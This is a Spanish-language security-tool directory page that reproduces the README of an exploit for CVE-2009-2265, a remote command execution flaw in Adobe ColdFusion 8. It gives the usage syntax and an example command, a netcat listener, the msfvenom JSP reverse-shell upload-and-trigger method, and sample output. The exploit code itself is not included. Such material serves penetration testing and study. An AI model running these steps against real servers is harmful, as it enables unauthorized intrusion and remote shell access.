Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - Ejecución Remota de Comandos (RCE) | Kitploit
Herramientas/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Ejecución Remota de Comandos (RCE)

Ver Repositorio
16hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Adobe ColdFusion 8 - Exploit de Ejecución Remota de Comandos (RCE)

Resumen

Este exploit apunta a una vulnerabilidad conocida en Adobe ColdFusion 8 (CVE-2009-2265). Permite la ejecución remota de comandos (RCE) mediante la subida de un payload JSP malicioso que establece una conexión de shell inversa.


Detalles del Exploit

  • CVE: CVE-2009-2265
  • Vulnerabilidad: Manejo incorrecto de subidas de archivos en Adobe ColdFusion 8.
  • Versiones Afectadas: Adobe ColdFusion 8.
  • Impacto: Permite a los atacantes ejecutar comandos arbitrarios en el servidor.

Características

  1. Genera automáticamente un payload JSP usando msfvenom.
  2. Sube el payload usando una solicitud POST multipart.
  3. Ejecuta el payload para establecer una shell inversa.
  4. Limpia automáticamente los archivos de payload locales después de la ejecución.

Uso

Para usar este exploit, necesitas lo siguiente:

  • Una máquina Kali Linux o un entorno de pruebas de penetración similar.
  • Netcat instalado para escuchar en el puerto especificado.
  • Un servidor vulnerable Adobe ColdFusion 8.

Sintaxis del Comando

./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

Argumentos

  • -l <LHOST>: IP local del atacante (ej., 10.10.16.5).
  • -p <LPORT>: Puerto local del atacante para la shell inversa (ej., 9001).
  • -r <RHOST>: IP remota del objetivo (ej., 10.10.10.11).
  • -q <RPORT>: Puerto remoto del objetivo donde se ejecuta ColdFusion (ej., 8500).

Ejemplo de Uso

./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. Inicia un listener en tu máquina atacante:

    nc -lnvp 9001
    
  2. Ejecuta el exploit con los argumentos apropiados.

  3. Una vez ejecutado, el payload se conectará de vuelta a tu listener.


Cómo Funciona

  1. Generar Payload:

    • El script usa msfvenom para generar un payload JSP malicioso.
    • El payload inicia una shell inversa hacia el LHOST y LPORT especificados.
  2. Subir Payload:

    • El payload se sube al servidor ColdFusion vulnerable usando una solicitud POST.
  3. Ejecutar Payload:

    • El payload subido se ejecuta enviando una solicitud GET a la URL del archivo.
  4. Establecer Shell Inversa:

    • Se establece una shell inversa, dando al atacante acceso al sistema objetivo.

Requisitos

  • msfvenom para la generación del payload.
  • curl para la subida de archivos y ejecución del payload.
  • nc (Netcat) para escuchar conexiones de shell inversa.

Ejemplo de Salida

[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

Descargo de Responsabilidad

Este script es solo con fines educativos. Úsalo en sistemas que poseas o para los que tengas permiso explícito de prueba. El uso no autorizado de este exploit en sistemas que no posees es ilegal y poco ético.


Autor

Desarrollado por [0xDTC].

Descargar herramienta